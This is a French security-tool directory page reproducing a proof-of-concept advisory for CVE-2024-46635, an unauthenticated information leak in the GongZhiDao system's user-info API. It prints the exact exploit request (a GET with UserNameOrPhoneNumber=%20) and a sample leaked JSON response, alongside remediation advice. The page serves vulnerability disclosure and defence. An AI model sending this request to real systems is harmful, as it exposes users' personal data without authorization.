Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-46635 — Preuve de concept pour CVE-2024-46635 : une vulnérabilité de validation d'entrée incorrecte dans le point de terminaison API du système GongZhiDao qui expose des informations sensibles des utilisateurs sans authentification. | Kitploit
Outils/GitHubGitHub/h1thub/cve-2024-46635
Analyse des VulnérabilitésCollecte d'InformationsSécurité WebTests d'IntrusionMauvaise ConfigurationSécurité des API
GitHubh1thub/cve-2024-46635

CVE-2024-46635

Preuve de concept pour CVE-2024-46635 : une vulnérabilité de validation d'entrée incorrecte dans le point de terminaison API du système GongZhiDao qui expose des informations sensibles des utilisateurs sans authentification.

Voir le dépôt
13il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-46635

Contexte

Le système GongZhiDao est une plateforme développée par GongZhiDao. Il fournit des solutions d'entreprise incluant la gestion des utilisateurs, l'analyse de données et des fonctionnalités opérationnelles. Cependant, une vulnérabilité de sécurité a été découverte dans l'un des points d'accès API qui pourrait potentiellement entraîner l'exposition d'informations sensibles des utilisateurs sans autorisation appropriée.

Description de la vulnérabilité

Une vulnérabilité existe dans le point d'accès API /oaa/api/AccountMaster/GetCurrentUserInfo du système GongZhiDao. En passant %20 (un espace encodé en URL) à la place du paramètre UserNameOrPhoneNumber, l'API répond avec des informations sensibles des utilisateurs, y compris l'identifiant du compte, le nom d'utilisateur et l'adresse e-mail, même sans authentification ou autorisation appropriée. Cette validation incorrecte des entrées permet aux attaquants d'accéder de manière non autorisée à des données sensibles.

Impact

Une exploitation réussie de cette vulnérabilité pourrait entraîner l'exposition de données sensibles des utilisateurs, notamment :

  • Identifiant du compte
  • Nom d'utilisateur
  • Adresse e-mail
  • Numéro de téléphone (si présent)
  • Autres informations personnelles
  • Un attaquant pourrait utiliser ces informations pour mener d'autres attaques, telles que l'usurpation d'identité ou le hameçonnage.

    Vecteur d'attaque

    Pour exploiter la vulnérabilité, un attaquant doit envoyer une requête HTTP GET spécialement conçue au point d'accès API vulnérable :

    root@kitploit:~
    GET /oaa/api/AccountMaster/GetCurrentUserInfo?UserNameOrPhoneNumber=%20 HTTP/2
    

    Cette requête retourne une réponse 200 OK avec des données sensibles des utilisateurs au format JSON :

    root@kitploit:~
    HTTP/2 200 OK
    Date: Tue, 10 Sep 2024 03:25:09 GMT
    Content-Type: application/json; charset=utf-8
    Content-Length: 153
    Server: nginx/1.22.0
    X-Powered-By: ASP.NET
    Set-Cookie: Path=/; HttpOnly; Secure
    
    {"accountId":"09c05434-e1ff-4436-b1b0-01215e48b274","name":"John","phoneNumber":null,"userName":"19999999999","email1":"[email protected]"}
    

    Détails techniques

    • Point d'accès affecté : /oaa/api/AccountMaster/GetCurrentUserInfo
    • Méthode : HTTP GET
    • Paramètres : UserNameOrPhoneNumber avec %20 comme entrée
    • Réponse : L'API retourne des données sensibles des utilisateurs au format JSON sans validation ou autorisation appropriée.
    • Type de vulnérabilité : Validation incorrecte des entrées / Divulgation d'informations sensibles

    Recommandations de correction

    1. Mettre en place une validation appropriée des entrées : Assurez-vous que le paramètre UserNameOrPhoneNumber est correctement nettoyé et validé. Les entrées telles que %20 doivent être rejetées.

    2. Vérifications d'autorisation : Mettez en place des mécanismes d'autorisation appropriés pour garantir que seuls les utilisateurs authentifiés et autorisés peuvent accéder aux informations sensibles.

    3. Limitation de débit et surveillance : Appliquez une limitation de débit aux points d'accès API pour prévenir les attaques par force brute ou automatisées, et surveillez l'activité API pour détecter des schémas d'accès anormaux.

    Crédits

    Cette vulnérabilité a été découverte par hithub.

    Références

    • CWE-20: Improper Input Validation
    Télécharger l’outil